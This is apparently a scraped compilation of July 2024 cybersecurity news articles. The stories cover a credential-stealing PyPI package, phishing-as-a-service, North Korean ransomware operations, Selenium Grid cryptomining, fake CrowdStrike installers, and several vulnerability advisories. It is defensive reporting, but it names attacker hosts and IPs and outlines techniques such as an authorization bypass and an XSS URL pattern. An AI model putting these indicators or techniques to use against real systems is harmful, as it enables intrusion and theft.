"Following a report from Sekoia.io, a disinfection operation was launched by the French judicial authorities to dismantle the botnet controlled by the PlugX worm. PlugX affected several million victims worldwide," Sekoia told The Hacker News. "A disinfection solution developed by the Sekoia.io TDR team was proposed via Europol to partner countries and is being deployed at this time."
"We are pleased with the fruitful cooperation with the actors involved in France (section J3 of the Paris Public Prosecutor's Office, Police, Gendarmerie and ANSSI) and internationally (Europol and police forces of third countries) to take action against long-lasting malicious cyber activities."
Malicious PyPI Package Targets macOS to Steal Google Cloud Credentials
27.7.24
Virus The Hacker News
Cybersecurity researchers have discovered a malicious package on the Python
Package Index (PyPI) repository that targets Apple macOS systems with the goal
of stealing users' Google Cloud credentials from a narrow pool of victims.
The package, named "lr-utils-lib," attracted a total of 59 downloads before it was taken down. It was uploaded to the registry in early June 2024.
"The malware uses a list of predefined hashes to target specific macOS machines and attempts to harvest Google Cloud authentication data," Checkmarx researcher Yehuda Gelb said in a Friday report. "The harvested credentials are sent to a remote server."
An important aspect of the package is that it first checks if it has been installed on a macOS system, and only then proceeds to compare the system's Universally Unique Identifier (UUID) against a hard-coded list of 64 hashes.
If the compromised machine is among those specified in the predefined set, it attempts to access two files, namely application_default_credentials.json and credentials.db, located in the ~/.config/gcloud directory, which contain Google Cloud authentication data.
The captured information is then transmitted over HTTP to a remote server "europe-west2-workload-422915[.]cloudfunctions[.]net."
Checkmarx said it also found a fake profile on LinkedIn with the name "Lucid Zenith" that matched the package's owner and falsely claimed to be the CEO of Apex Companies, suggesting a possible social engineering element to the attack.
Exactly who is behind the campaign is currently not known. However, it comes more than two months after cybersecurity firm Phylum disclosed details of another supply chain attack involving a Python package called "requests-darwin-lite" that was also found to unleash its malicious actions after checking the UUID of the macOS host.
These campaigns are a sign that threat actors have prior knowledge of the macOS systems they want to infiltrate and are going to great lengths to ensure that the malicious packages are distributed only to those particular machines.
It also speaks to the tactics malicious actors employ to distribute lookalike packages, aiming to deceive developers into incorporating them into their applications.
"While it is not clear whether this attack targeted individuals or enterprises, these kinds of attacks can significantly impact enterprises," Gelb said. "While the initial compromise usually occurs on an individual developer's machine, the implications for enterprises can be substantial."
This AI-Powered Cybercrime Service Bundles Phishing Kits with Malicious
Android Apps
27.7.24
AI The Hacker News
A Spanish-speaking cybercrime group named GXC Team has been observed bundling
phishing kits with malicious Android applications, taking malware-as-a-service (MaaS)
offerings to the next level.
Singaporean cybersecurity company Group-IB, which has been tracking the e-crime actor since January 2023, described the crimeware solution as a "sophisticated AI-powered phishing-as-a-service platform" capable of targeting users of more than 36 Spanish banks, governmental bodies, and 30 institutions worldwide.
The phishing kit is priced anywhere between $150 and $900 a month, whereas the bundle including the phishing kit and Android malware is available on a subscription basis for about $500 per month.
Targets of the campaign include users of Spanish financial institutions, as well as tax and governmental services, e-commerce, banks, and cryptocurrency exchanges in the United States, the United Kingdom, Slovakia, and Brazil. As many as 288 phishing domains linked to the activity have been identified to date.
Also part of the spectrum of services offered are the sale of stolen banking credentials and custom coding-for-hire schemes for other cybercriminal groups targeting banking, financial, and cryptocurrency businesses.
"Unlike typical phishing developers, the GXC Team combined phishing kits together with an SMS OTP stealer malware pivoting a typical phishing attack scenario in a slightly new direction," security researchers Anton Ushakov and Martijn van den Berk said in a Thursday report.
What's notable here is that the threat actors, instead of directly making use of a bogus page to grab the credentials, urge the victims to download an Android-based banking app to prevent phishing attacks. These pages are distributed via smishing and other methods.
Once installed, the app requests for permissions to be configured as the default SMS app, thereby making it possible to intercept one-time passwords (OTPs) and other messages and exfiltrate them to a Telegram bot under their control.
"In the final stage the app opens a genuine bank's website in WebView allowing users to interact with it normally," the researchers said. "After that, whenever the attacker triggers the OTP prompt, the Android malware silently receives and forwards SMS messages with OTP codes to the Telegram chat controlled by the threat actor."
Among the other services advertised by the threat actor on a dedicated Telegram channel are AI-infused voice calling tools that allow its customers to generate voice calls to prospective targets based on a series of prompts directly from the phishing kit.
These calls typically masquerade as originating from a bank, instructing them to provide their two-factor authentication (2FA) codes, install malicious apps, or perform other arbitrary actions.
"Employing this simple yet effective mechanism enhances the scam scenario even more convincing to their victims, and demonstrates how rapidly and easily AI tools are adopted and implemented by criminals in their schemes, transforming traditional fraud scenarios into new, more sophisticated tactics," the researchers pointed out.
In a recent report, Google-owned Mandiant revealed how AI-powered voice cloning have the capability to mimic human speech with "uncanny precision," thus allowing for more authentic-sounding phishing (or vishing) schemes that facilitate initial access, privilege escalation, and lateral movement.
"Threat actors can impersonate executives, colleagues, or even IT support personnel to trick victims into revealing confidential information, granting remote access to systems, or transferring funds," the threat intelligence firm said.
"The inherent trust associated with a familiar voice can be exploited to
manipulate victims into taking actions they would not normally take, such as
clicking on malicious links, downloading malware, or divulging sensitive data."
Phishing kits, which also come with adversary-in-the-middle (AiTM) capabilities, have become increasingly popular as they lower the technical barrier to entry for pulling off phishing campaigns at scale.
Security researcher mr.d0x, in a report published last month, said it's possible for bad actors to take advantage of progressive web apps (PWAs) to design convincing login pages for phishing purposes by manipulating the user interface elements to display a fake URL bar.
What's more, such AiTM phishing kits can also be used to break into accounts protected by passkeys on various online platforms by means of what's called an authentication method redaction attack, which takes advantage of the fact that these services still offer a less-secure authentication method as a fallback mechanism even when passkeys have been configured.
"Since the AitM can manipulate the view presented to the user by modifying HTML, CSS, and images, or JavaScript in the login page, as it is proxied through to the end user, they can control the authentication flow and remove all references to passkey authentication," cybersecurity company eSentire said.
The disclosure comes amid a recent surge in phishing campaigns embedding URLs that are already encoded using security tools such as Secure Email Gateways (SEGs) in an attempt to mask phishing links and evade scanning, according to Barracuda Networks and Cofense.
Social engineering attacks have also been observed resorting to unusual methods wherein users are enticed into visiting seemingly legitimate-but-compromised websites and are then asked to manually copy, paste, and execute obfuscated code into a PowerShell terminal under the guise of fixing issues with viewing content in a web browser.
Details of the malware delivery method have been previously documented by ReliaQuest and Proofpoint. McAfee Labs is tracking the activity under the moniker ClickFix.
"By embedding Base64-encoded scripts within seemingly legitimate error prompts, attackers deceive users into performing a series of actions that result in the execution of malicious PowerShell commands," researchers Yashvi Shah and Vignesh Dhatchanamoorthy said.
"These commands typically download and execute payloads, such as HTA files, from remote servers, subsequently deploying malware like DarkGate and Lumma Stealer."
U.S. DoJ Indicts North Korean Hacker for Ransomware Attacks on Hospitals
27.7.24
BigBrothers The Hacker News
The U.S. Department of Justice (DoJ) on Thursday unsealed an indictment against
a North Korean military intelligence operative for allegedly carrying out
ransomware attacks against healthcare facilities in the country and funneling
the payments to orchestrate additional intrusions into defense, technology, and
government entities across the world.
"Rim Jong Hyok and his co-conspirators deployed ransomware to extort U.S. hospitals and health care companies, then laundered the proceeds to help fund North Korea's illicit activities," said Paul Abbate, deputy director of the Federal Bureau of Investigation (FBI). "These unacceptable and unlawful actions placed innocent lives at risk."
Concurrent with the indictment, the U.S. Department of State announced a reward of up to $10 million for information that could lead to his whereabouts, or the identification of other individuals in connection with the malicious activity.
Hyok, part of a hacking crew dubbed Andariel (aka APT45, Nickel Hyatt, Onyx Sleet, Silent Chollima, Stonefly, and TDrop2), is said to be behind extortion-related cyber attacks involving a ransomware strain called Maui, which was first disclosed in 2022 as targeting organizations in Japan and the U.S.
The ransom payments were laundered through Hong Kong-based facilitators, converting the illicit proceeds into Chinese yuan, following which they were withdrawn from an ATM and used to procure virtual private servers (VPSes) that, in turn, were employed to exfiltrate sensitive defense and technology information.
Targets of the campaign include two U.S. Air Force bases, NASA-OIG, as well as South Korean and Taiwanese defense contractors and a Chinese energy company.
In one instance highlighted by the State Department, a cyber attack that began in November 2022 led to the threat actors exfiltrating more than 30 gigabytes of data from an unnamed U.S.-based defense contractor. This comprised unclassified technical information regarding material used in military aircraft and satellites.
The agencies have also announced the "interdiction of approximately $114,000 in virtual currency proceeds of ransomware attacks and related money laundering transactions, as well as the seizure of online accounts used by co-conspirators to carry out their malicious cyber activity."
Andariel, affiliated with the Reconnaissance General Bureau (RGB) 3rd Bureau, has a track record of striking foreign businesses, governments, aerospace, nuclear, and defense industries with the goal of obtaining sensitive and classified technical information and intellectual property to further the regime's military and nuclear aspirations.
Other recent targets of interest encompass South Korean educational institutions, construction companies, and manufacturing organizations.
"This group poses an ongoing threat to various industry sectors worldwide, including, but not limited to, entities in the United States, South Korea, Japan, and India," the National Security Agency (NSA) said. "The group funds their espionage activity through ransomware operations against U.S. healthcare entities."
Initial access to target networks is accomplished by means of exploiting known
N-day security flaws in internet-facing applications, enabling the hacking group
to conduct follow-on reconnaissance, filesystem enumeration, persistence,
privilege escalation, lateral movement, and data exfiltration steps using a
combination of custom backdoors, remote access trojans, off-the-shelf tools, and
open-source utilities at their disposal.
Other documented malware distribution vectors entail the use of phishing emails containing malicious attachments, such as Microsoft Windows Shortcut (LNK) files or HTML Application (HTA) script files inside ZIP archives.
"The actors are well-versed in using native tools and processes on systems, known as living-off-the-land (LotL)," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said. "They use Windows command line, PowerShell, Windows Management Instrumentation command line (WMIC), and Linux bash, for system, network, and account enumeration."
Microsoft, in its own advisory on Andariel, described it as constantly evolving its toolset to add new functionality and implement novel ways to bypass detection, while exhibiting a "fairly uniform attack pattern."
"Onyx Sleet's ability to develop a spectrum of tools to launch its tried-and-true attack chain makes it a persistent threat, particularly to targets of interest to North Korean intelligence, like organizations in the defense, engineering, and energy sectors," the Windows maker noted.
Some of the noteworthy tools highlighted by Microsoft are listed below -
TigerRAT - A malware that can steal confidential information and carry out
commands, like keylogging and screen recording, from a command-and-control (C2)
server
SmallTiger - A C++ backdoor
LightHand - A lightweight backdoor for remote access to infected devices
ValidAlpha (aka Black RAT) - A Go-based backdoor that can run an arbitrary file,
list contents of a directory, download a file, take screenshots, and launch a
shell to execute arbitrary commands
Dora RAT - A "simple malware strain" with support for reverse shell and file
download/upload capabilities
"They have evolved from targeting South Korean financial institutions with
disruptive attacks to targeting U.S. healthcare with ransomware, known as Maui,
although not at the same scale as other Russian speaking cybercrime groups,"
Alex Rose, director of threat research and government partnerships at
Secureworks Counter Threat Unit, said.
"This is in addition to their primary mission of gathering intelligence on foreign military operations and strategic technology acquisition."
Andariel is just one of the myriad state-sponsored hacking crews operating under the direction of the North Korean government and military, alongside other clusters tracked as the Lazarus Group, BlueNoroff, Kimsuky, and ScarCruft.
"For decades, North Korea has been involved in illicit revenue generation through criminal enterprises, to compensate for the lack of domestic industry and their global diplomatic and economic isolation," Rose added.
"Cyber was rapidly adopted as a strategic capability that could be used for both intelligence gathering and money making. Where historically these objectives would have been covered by different groups, in the last few years there has been a blurring of the lines and many of the cyber threat groups operating on behalf of North Korea have also dabbled in money making activities."
Ongoing Cyberattack Targets Exposed Selenium Grid Services for Crypto Mining
27.7.24
Cryptocurrency The Hacker News
Cybersecurity researchers are sounding the alarm over an ongoing campaign that's
leveraging internet-exposed Selenium Grid services for illicit cryptocurrency
mining.
Cloud security firm Wiz is tracking the activity under the name SeleniumGreed. The campaign, which is targeting older versions of Selenium (3.141.59 and prior), is believed to be underway since at least April 2023.
"Unbeknownst to most users, Selenium WebDriver API enables full interaction with the machine itself, including reading and downloading files, and running remote commands," Wiz researchers Avigayil Mechtinger, Gili Tikochinski, and Dor Laska said.
"By default, authentication is not enabled for this service. This means that many publicly accessible instances are misconfigured and can be accessed by anyone and abused for malicious purposes."
Selenium Grid, part of the Selenium automated testing framework, enables parallel execution of tests across multiple workloads, different browsers, and various browser versions.
"Selenium Grid must be protected from external access using appropriate firewall
permissions," the project maintainers warn in a support documentation, stating
that failing to do so could allow third-parties to run arbitrary binaries and
access internal web applications and files.
Exactly who is behind the attack campaign is currently not known. However, it
involves the threat actor targeting publicly exposed instances of Selenium Grid
and making use of the WebDriver API to run Python code responsible for
downloading and running an XMRig miner.
It starts with the adversary sending a request to the vulnerable Selenium Grid hub with an aim to execute a Python program containing a Base64-encoded payload that spawns a reverse shell to an attacker-controlled server ("164.90.149[.]104") in order to fetch the final payload, a modified version of the open-source XMRig miner.
"Instead of hardcoding the pool IP in the miner configuration, they dynamically generate it at runtime," the researchers explained. "They also set XMRig's TLS-fingerprint feature within the added code (and within the configuration), ensuring the miner will only communicate with servers controlled by the threat actor."
The IP address in question is said to belong to a legitimate service that has been compromised by the threat actor, as it has also been found to host a publicly exposed Selenium Grid instance.
Wiz said it's possible to execute remote commands on newer versions of Selenium and that it identified more than 30,000 instances exposed to remote command execution, making it imperative that users take steps to close the misconfiguration.
"Selenium Grid is not designed to be exposed to the internet and its default configuration has no authentication enabled, so any user that has network access to the hub can interact with the nodes via API," the researchers said.
"This poses a significant security risk if the service is deployed on a machine with a public IP that has inadequate firewall policy."
CrowdStrike Warns of New Phishing Scam Targeting German Customers
27.7.24
Phishing The Hacker News
CrowdStrike is alerting about an unfamiliar threat actor attempting to
capitalize on the Falcon Sensor update fiasco to distribute dubious installers
targeting German customers as part of a highly targeted campaign.
The cybersecurity company said it identified what it described as an unattributed spear-phishing attempt on July 24, 2024, distributing an inauthentic CrowdStrike Crash Reporter installer via a website impersonating an unnamed German entity.
The imposter website is said to have been created on July 20, a day after the botched update crashed nearly 9 million Windows devices, causing extensive IT disruptions across the world.
"After the user clicks the Download button, the website leverages JavaScript (JS) that masquerades as JQuery v3.7.1 to download and deobfuscate the installer," CrowdStrike's Counter Adversary Operations team said.
"The installer contains CrowdStrike branding, German localization, and a password [is] required to continue installing the malware."
Specifically, the spear-phishing page featured a download link to a ZIP archive file containing a malicious InnoSetup installer, with the malicious code serving the executable injected into a JavaScript file named "jquery-3.7.1.min.js" in an apparent effort to evade detection.
Users who end up launching the bogus installer are then prompted to enter a "Backend-Server" to proceed further. CrowdStrike said it was unable to recover the final payload deployed via the installer.
The campaign is assessed to be highly targeted owing to the fact that the installer is password-protected and requires input that's likely only known to the targeted entities. Furthermore, the presence of the German language suggests that the activity is geared towards German-speaking CrowdStrike customers.
"The threat actor appears to be highly aware of operations security (OPSEC) practices, as they have focused on anti-forensic techniques during this campaign," CrowdStrike said.
"For example, the actor registered a subdomain under the it[.]com domain, preventing historical analysis of the domain-registration details. Additionally, encrypting the installer contents and preventing further activity from occurring without a password precludes further analysis and attribution."
The development comes amid a wave of phishing attacks taking advantage of the
CrowdStrike update issue to propagate stealer malware -
A phishing domain crowdstrike-office365[.]com that hosts rogue archive files
containing a Microsoft Installer (MSI) loader that ultimately executes a
commodity information stealer called Lumma.
A ZIP file ("CrowdStrike Falcon.zip") that contains a Python-based information
stealer tracked as Connecio that collects system information, external IP
address, and data from various web browsers, and exfiltrates them to SMTP
accounts listed on a Pastebin dead-drop URL.
On Thursday, CrowdStrike's CEO George Kurtz said 97% of the Windows devices that
went offline during the global IT outage are now operational.
"At CrowdStrike, our mission is to earn your trust by safeguarding your operations. I am deeply sorry for the disruption this outage has caused and personally apologize to everyone impacted," Kurtz said. "While I can't promise perfection, I can promise a response that is focused, effective, and with a sense of urgency."
Previously, the company's chief security officer Shawn Henry apologized for failing to "protect good people from bad things," and that it "let down the very people we committed to protect."
"The confidence we built in drips over the years was lost in buckets within hours, and it was a gut punch," Henry acknowledged. "We are committed to re-earning your trust by delivering the protection you need to disrupt the adversaries targeting you. Despite this setback, the mission endures."
Meanwhile, Bitsight's analysis of traffic patterns exhibited by CrowdStrike machines across organizations globally has revealed two "interesting" data points that it said warrants additional investigation.
"Firstly, on July 16 at around 22:00 there was a huge traffic spike, followed by a clear and significant drop off in egress traffic from organizations to CrowdStrike," security researcher Pedro Umbelino said. "Second, there was a significant drop, between 15% and 20%, in the number of unique IPs and organizations connected to CrowdStrike Falcon servers, after the dawn of the 19th."
"While we can not infer what the root cause of the change in traffic patterns on the 16th can be attributed to, it does warrant the foundational question of 'Is there any correlation between the observations on the 16th and the outage on the 19th?'"
Update#
While the full impact of the IT outage remains to be tallied, cloud insurance
services firm Parametrix Solutions estimates that the event impacted nearly a
quarter of the Fortune 500 companies, resulting in a direct financial loss of
$5.4 billion (excluding Microsoft), including $1.94 billion in losses for
healthcare, $1.15 billion for banking, and $0.86 billion for the airlines
sector.
John Cable, vice president of program management for Windows servicing and delivery, said the incident "underscores the need for mission-critical resiliency within every organization."
"These improvements must go hand in hand with ongoing improvements in security and be in close cooperation with our many partners, who also care deeply about the security of the Windows ecosystem," Cable said, urging enterprises to have a major incident response plan (MIRP) in place, periodically take data backups, utilize deployment rings, and enable Windows security baselines.
With endpoint detection and response (EDR) software requiring kernel-level access to detect threats in Windows, the disruptive event appears to have also had the desired effect of Microsoft rethinking the entire approach.
Redmond said alternative features like virtualization-based security (VBS) enclaves, which it introduced back in May, could be used by third-party developers to create an "isolated compute environment that does not require kernel mode drivers to be tamper resistant." Azure Attestation, another security solution, enables remote verification of the "trustworthiness of a platform and integrity of the binaries running inside it."
Critical Flaw in Telerik Report
Server Poses Remote Code Execution Risk
26.7.24
Vulnerebility The Hacker News
Progress Software is urging users to update their Telerik Report Server
instances following the discovery of a critical security flaw that could result
in remote code execution.
The vulnerability, tracked as CVE-2024-6327 (CVSS score: 9.9), impacts Report Server version 2024 Q2 (10.1.24.514) and earlier.
"In Progress Telerik Report Server versions prior to 2024 Q2 (10.1.24.709), a remote code execution attack is possible through an insecure deserialization vulnerability," the company said in an advisory.
Deserialization flaws occur when an application reconstructs untrusted data that an attacker has control over without adequate validation in place, resulting in the execution of unauthorized commands.
Progress Software said the flaw has been addressed in version 10.1.24.709. As temporary mitigation, it's recommended to change the user for the Report Server Application Pool to one with limited permission.
Administrators can check if their servers are vulnerable to attacks by going through these steps -
Go
to the Report Server web UI and log in using an account with administrator
rights
Open the Configuration page (~/Configuration/Index).
Select the About tab and the version number will be displayed in the pane on the
right.
The disclosure comes nearly two months after the company patched another
critical shortcoming in the same software (CVE-2024-4358, CVSS score: 9.8) that
could be abused by a remote attacker to bypass authentication and create rogue
administrator users.
North Korean Hackers Shift from
Cyber Espionage to Ransomware Attacks
26.7.24
Ransom The Hacker News
A North Korea-linked threat actor known for its cyber espionage operations has
gradually expanded into financially-motivated attacks that involve the
deployment of ransomware, setting it apart from other nation-state hacking
groups linked to the country.
Google-owned Mandiant is tracking the activity cluster under a new moniker APT45, which overlaps with names such as Andariel, Nickel Hyatt, Onyx Sleet, Stonefly, and Silent Chollima.
"APT45 is a long-running, moderately sophisticated North Korean cyber operator that has carried out espionage campaigns as early as 2009," researchers Taylor Long, Jeff Johnson, Alice Revelli, Fred Plan, and Michael Barnhart said. "APT45 has been the most frequently observed targeting critical infrastructure."
It's worth mentioning that APT45, along with APT38 (aka BlueNoroff), APT43 (aka Kimsuky), and Lazarus Group (aka TEMP.Hermit), are elements within North Korea's Reconnaissance General Bureau (RGB), the nation's premier military intelligence organization.
APT45 is notably linked to the deployment of ransomware families tracked as SHATTEREDGLASS and Maui targeting entities in South Korea, Japan, and the U.S. in 2021 and 2022. Details of SHATTEREDGLASS were documented by Kaspersky in June 2021.
"It is possible that APT45 is carrying out financially-motivated cybercrime not
only in support of its own operations but to generate funds for other North
Korean state priorities," Mandiant said.
Another prominent malware in its arsenal is a backdoor dubbed Dtrack (aka Valefor and Preft), which was first used in a cyber attack aimed at the Kudankulam Nuclear Power Plant in India in 2019, marking one of the few publicly known instances of North Korean actors striking critical infrastructure.
"APT45 is one of North Korea's longest running cyber operators, and the group's activity mirrors the regime's geopolitical priorities even as operations have shifted from classic cyber espionage against government and defense entities to include healthcare and crop science," Mandiant said.
"As the country has become reliant on its cyber operations as an instrument of national power, the operations carried out by APT45 and other North Korean cyber operators may reflect the changing priorities of the country's leadership."
The findings come as security awareness training firm KnowBe4 said it was tricked into hiring an IT worker from North Korea as a software engineer, who used a stolen identity of a U.S. citizen and enhanced their picture using artificial intelligence (AI).
"This was a skillful North Korean IT worker, supported by a state-backed criminal infrastructure, using the stolen identity of a U.S. citizen participating in several rounds of video interviews and circumvented background check processes commonly used by companies," the company said.
The IT worker army, assessed to be part of the Workers' Party of Korea's Munitions Industry Department, has a history of seeking employment in U.S.-based firms by pretending to be located in the country when they are actually in China and Russia and logging-in remotely through company-issued laptops delivered to a "laptop farm."
KnowBe4 said it detected suspicious activities on the Mac workstation sent to the individual on July 15, 2024, at 9:55 p.m. EST that consisted of manipulating session history files, transferring potentially harmful files, and executing harmful software. The malware was downloaded using a Raspberry Pi.
Twenty-five minutes later, the Florida-based cybersecurity company said it
contained the employee's device. There is no evidence that the attacker gained
unauthorized access to sensitive data or systems.
"The scam is that they are actually doing the work, getting paid well, and giving a large amount to North Korea to fund their illegal programs," KnowBe4's chief executive Stu Sjouwerman said.
"This case highlights the critical need for more robust vetting processes, continuous security monitoring, and improved coordination between HR, IT, and security teams in protecting against advanced persistent threats."
Meta Removes 63,000 Instagram Accounts Linked to Nigerian Sextortion Scams
26.7.24
Social The Hacker News
Meta Platforms on Wednesday said it took steps to remove around 63,000 Instagram
accounts in Nigeria that were found to target people with financial sextortion
scams.
"These included a smaller coordinated network of around 2,500 accounts that we were able to link to a group of around 20 individuals," the company said. "They targeted primarily adult men in the U.S. and used fake accounts to mask their identities."
In cases where some of these accounts attempted to target minors, Meta said it reported them to the National Center for Missing and Exploited Children (NCMEC).
Separately, Meta said it also removed 7,200 assets, including 1,300 Facebook accounts, 200 Facebook Pages and 5,700 Facebook Groups, based in Nigeria that were used to organize, recruit and train new scammers.
"Their efforts included offering to sell scripts and guides to use when scamming people, and sharing links to collections of photos to use when populating fake accounts," it said.
Meta attributed the second cluster to a cybercrime group tracked as Yahoo Boys, which came under the radar earlier this year for orchestrating financial sextortion attacks targeting teenagers from Australia, Canada, and the U.S.
A subsequent report from Bloomberg exposed sextortion-fueled suicides, revealing how scammers are posing as teenage girls on Instagram and Snapchat to lure targets and entice them into sending explicit photos, which are then used to blackmail victims in exchange for money or risk getting their images forwarded to their friends.
Back in April, the social media giant said it has devised new methods to identify accounts that are potentially engaging in sextortion, and that it's enacting measures to prevent these accounts from finding and interacting with teens.
"Financial sextortion is a horrific crime that can have devastating consequences," Meta said. "This is an adversarial space where criminals evolve to evade our ever-improving defenses."
Meta's actions come as INTERPOL said it conducted a global law enforcement operation referred to as Jackal III that targeted West African organized crime groups such as Black Axe, leading to scores of arrests and the seizure of $3 million in illegal assets, including cryptocurrencies and luxury items.
The effort, which took place between April 10 and July 3, 2024, spanned 21 countries and was orchestrated with an aim to dismantle transnational organized crime syndicates involved in cyber fraud, human trafficking, drug smuggling, and violent crimes both within Africa and globally.
"The annual operation resulted in some 300 arrests, the identification of over
400 additional suspects, and the blocking of more than 720 bank accounts,"
INTERPOL said in a press statement.
The development also follows a wave of other law enforcement actions from across the world designed to tackle cybercrime -
Vyacheslav Igorevich Penchukov (aka father and tank), who
pleaded guilty at the start of the year for his role in the Zeus and IcedID
malware operations, was sentenced by a U.S. court to nine years in prison and
three years of supervised release. He was also ordered to pay $73 million in
restitution.
The Ukrainian Cyber Police announced the arrest of two people in connection with
financial theft attacks targeting "leading industrial enterprises" in the
country, leading to losses amounting to $145,000 (six million hryvnias). If
found guilty, they face up to 12 years in prison.
Spain's La Guardia Civil arrested three suspected members of NoName057(16),
prompting the pro-Russian hacktivist group to declare a "holy war" on the
country. The individuals have been accused of participating in "denial-of-service
cyber attacks against public institutions and strategic sectors of Spain and
other NATO countries." The group called the arrests a "witch hunt" by
Russophobic authorities.
The U.K. National Crime Agency (NCA) said it infiltrated and took down
digitalstress[.]su, a DDoS-for-hire (aka booter) service linked to "tens of
thousands of attacks every week" globally. The site's suspected owner, who goes
by the name Skiop, has also been arrested. The takedown, part of an ongoing
coordinated effort dubbed Operation PowerOFF, came after German police disrupted
the Stresser.tech DDoS attack service in April 2024.
Researchers Reveal ConfusedFunction Vulnerability in Google Cloud Platform
26.7.24
Vulnerebility The Hacker News
Cybersecurity researchers have disclosed a privilege escalation vulnerability
impacting Google Cloud Platform's Cloud Functions service that an attacker could
exploit to access other services and sensitive data in an unauthorized manner.
Tenable has given the vulnerability the name ConfusedFunction.
"An attacker could escalate their privileges to the Default Cloud Build Service Account and access numerous services such as Cloud Build, storage (including the source code of other functions), artifact registry and container registry," the exposure management company said in a statement.
"This access allows for lateral movement and privilege escalation in a victim's project, to access unauthorized data and even update or delete it."
Cloud Functions refers to a serverless execution environment that allows developers to create single-purpose functions that are triggered in response to specific Cloud events without the need to manage a server or update frameworks.
The problem discovered by Tenable has to do with the fact that a Cloud Build service account is created in the background and linked to a Cloud Build instance by default when a Cloud Function is created or updated.
This service account opens the door for potential malicious activity owing to its excessive permissions, thereby permitting an attacker with access to create or update a Cloud Function to leverage this loophole and escalate their privileges to the service account.
This permission could then be abused to access other Google Cloud services that are also created in tandem with the Cloud Function, including Cloud Storage, Artifact Registry, and Container Registry. In a hypothetical attack scenario, ConfusedFunction could be exploited to leak the Cloud Build service account token via a webhook.
Following responsible disclosure, Google has updated the default behavior such
that Cloud Build uses the Compute Engine default service account to prevent
misuse. However, it's worth noting that these changes do not apply to existing
instances.
"The ConfusedFunction vulnerability highlights the problematic scenarios that may arise due to software complexity and inter-service communication in a cloud provider's services," Tenable researcher Liv Matan said.
"While the GCP fix has reduced the severity of the problem for future deployments, it didn't completely eliminate it. That's because the deployment of a Cloud Function still triggers the creation of the aforementioned GCP services. As a result, users must still assign minimum but still relatively broad permissions to the Cloud Build service account as part of a function's deployment."
The development comes as Outpost24 detailed a medium-severity cross-site scripting (XSS) flaw in the Oracle Integration Cloud Platform that could be weaponized to inject malicious code into the application.
The flaw, which is rooted in the handling of the "consumer_url" parameter, was resolved by Oracle in its Critical Patch Update (CPU) released earlier this month.
"The page for creating a new integration, found at https://<instanceid>.integration.ocp.oraclecloud.com/ic/integration/home/faces/link?page=integration&consumer_url=<payload>, did not require any other parameters," security researcher Filip Nyquist said.
"This meant that an attacker would only need to identify the instance-id of the
specific integration platform to send a functional payload to any user of the
platform. Consequently, the attacker could bypass the requirement of knowing a
specific integration ID, which is typically accessible only to logged-in users."
It also follows Assetnote's discovery of three security vulnerabilities in the ServiceNow cloud computing platform (CVE-2024-4879, CVE-2024-5178, and CVE-2024-5217) that could be fashioned into an exploit chain in order to gain full database access and execute arbitrary code on the within the context of the Now Platform.
The ServiceNow shortcomings have since come under active exploitation by unknown threat actors as part of a "global reconnaissance campaign" designed to gather database details, such as user lists and account credentials, from susceptible instances.
The activity, targeting companies in various industry verticals such as energy, data centers, software development, and government entities in the Middle East, could be leveraged for "cyber espionage and further targeting," Resecurity said.
(The story was updated after publication to include details about active exploitation of ServiceNow flaws.)
Critical Docker Engine Flaw Allows
Attackers to Bypass Authorization Plugins
26.7.24
Vulnerebility The Hacker News
Docker is warning of a critical flaw impacting certain versions of Docker Engine
that could allow an attacker to sidestep authorization plugins (AuthZ) under
specific circumstances.
Tracked as CVE-2024-41110, the bypass and privilege escalation vulnerability carries a CVSS score of 10.0, indicating maximum severity.
"An attacker could exploit a bypass using an API request with Content-Length set to 0, causing the Docker daemon to forward the request without the body to the AuthZ plugin, which might approve the request incorrectly," the Moby Project maintainers said in an advisory.
Docker said the issue is a regression in that the issue was originally discovered in 2018 and addressed in Docker Engine v18.09.1 in January 2019, but never got carried over to subsequent versions (19.03 and later).
Cybersecurity
The issue has been resolved in versions 23.0.14 and 27.1.0 as of July 23, 2024,
after the problem was identified in April 2024. The following versions of Docker
Engine are impacted assuming AuthZ is used to make access control decisions -
<=
v19.03.15
<= v20.10.27
<= v23.0.14
<= v24.0.9
<= v25.0.5
<= v26.0.2
<= v26.1.4
<= v27.0.3, and
<= v27.1.0
"Users of Docker Engine v19.03.x and later versions who do not rely on
authorization plugins to make access control decisions and users of all versions
of Mirantis Container Runtime are not vulnerable," Docker's Gabriela Georgieva
said.
"Users of Docker commercial products and internal infrastructure who do not rely on AuthZ plugins are unaffected."
It also affects Docker Desktop up to versions 4.32.0, although the company said the likelihood of exploitation is limited and it requires access to the Docker API, necessitating that an attacker already has local access to the host. A fix is expected to be included in a forthcoming release (version 4.33).
"Default Docker Desktop configuration does not include AuthZ plugins," Georgieva noted. "Privilege escalation is limited to the Docker Desktop [virtual machine], not the underlying host."
Although Docker makes no mention of CVE-2024-41110 being exploited in the wild, it's essential that users apply their installations to the latest version to mitigate potential threats.
Earlier this year, Docker moved to patch a set of flaws dubbed Leaky Vessels that could enable an attacker to gain unauthorized access to the host filesystem and break out of the container.
"As cloud services rise in popularity, so does the use of containers, which have become an integrated part of cloud infrastructure," Palo Alto Networks Unit 42 said in a report published last week. "Although containers provide many advantages, they are also susceptible to attack techniques like container escapes."
"Sharing the same kernel and often lacking complete isolation from the host's user-mode, containers are susceptible to various techniques employed by attackers seeking to escape the confines of a container environment."
CISA Warns of Exploitable
Vulnerabilities in Popular BIND 9 DNS Software
26.7.24
ICS The Hacker News
The Internet Systems Consortium (ISC) has released patches to address multiple
security vulnerabilities in the Berkeley Internet Name Domain (BIND) 9 Domain
Name System (DNS) software suite that could be exploited to trigger a denial-of-service
(DoS) condition.
"A cyber threat actor could exploit one of these vulnerabilities to cause a denial-of-service condition," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in an advisory.
The list of four vulnerabilities is listed below -
CVE-2024-4076 (CVSS score: 7.5) - Due to a logic error,
lookups that triggered serving stale data and required lookups in local
authoritative zone data could have resulted in an assertion failure
CVE-2024-1975 (CVSS score: 7.5) - Validating DNS messages signed using the SIG(0)
protocol could cause excessive CPU load, leading to a denial-of-service
condition.
CVE-2024-1737 (CVSS score: 7.5) - It is possible to craft excessively large
numbers of resource record types for a given owner name, which has the effect of
slowing down database processing
CVE-2024-0760 (CVSS score: 7.5) - A malicious DNS client that sent many queries
over TCP but never read the responses could cause a server to respond slowly or
not at all for other clients
Successful exploitation of the aforementioned bugs could cause a named instance
to terminate unexpectedly, deplete available CPU resources, slow down query
processing by a factor of 100, and render the server unresponsive.
